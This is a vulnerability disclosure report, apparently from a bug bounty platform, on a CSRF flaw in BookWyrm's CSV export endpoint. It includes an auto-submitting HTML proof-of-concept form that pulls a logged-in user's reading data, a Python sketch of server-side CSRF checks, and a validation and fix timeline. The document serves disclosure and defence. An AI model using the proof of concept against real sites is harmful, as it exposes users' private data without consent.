Cross-Site Request Forgery (CSRF) in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 11th 2022


Description

An attacker is able to download data from a user via the CSV Export function. The export will include all the books on your shelves, books you have reviewed, and books with reading activity.

Vulnerable URL

https://bookwyrm.social/preferences/export/file

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://bookwyrm.social/preferences/export/file">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of downloading user reading data.
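As an added illustration (not BookWyrm's own code and not the fix landed in commit f1ae64), the following Python models the checks a server-side CSRF gate applies before serving a sensitive endpoint such as the export URL above, and shows why the report's auto-submitted GET form is rejected once they are in place. The `Request` class, `SITE_ORIGIN`, the cookie and form-field names, and the cross-site origin used in the sample are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed example of a minimal CSRF gate for a data-disclosing endpoint
# like /preferences/export/file. Names are assumptions, not BookWyrm's code.
SITE_ORIGIN = "https://bookwyrm.social"


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def new_session_token() -> str:
    """Token bound to the session; rendered into the export form as a hidden field."""
    return secrets.token_urlsafe(32)


def csrf_allowed(req: Request) -> tuple[bool, str]:
    """Return (allowed, reason), mirroring what a framework CSRF middleware checks."""
    # 1. Never serve the export on GET: a cross-site <form> or <img> can issue a
    #    GET that the browser sends with the victim's session cookies attached.
    if req.method != "POST":
        return False, "method not allowed"
    # 2. Origin (Referer as fallback) must be our own site.
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if not source:
        return False, "missing Origin/Referer"
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return False, "cross-site origin"
    # 3. Token submitted in the form must match the session-bound token
    #    (constant-time compare); a third-party page cannot read it.
    expected = req.cookies.get("csrftoken", "")
    submitted = req.form.get("csrfmiddlewaretoken", "")
    if not expected or not hmac.compare_digest(expected, submitted):
        return False, "csrf token mismatch"
    return True, "ok"


def poc_request() -> Request:
    """The report's PoC as the server sees it: a GET from a third-party page
    carrying the victim's cookies (constructed values) but no form token."""
    return Request("GET", "/preferences/export/file",
                   headers={"Referer": "https://third-party.example/"},
                   cookies={"sessionid": "victim-session", "csrftoken": "abc"})
```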

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Mouse Reeve validated this vulnerability a year ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve marked this as fixed in 0.4.4 with commit f1ae64 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
export.py#L24-L52 has been validated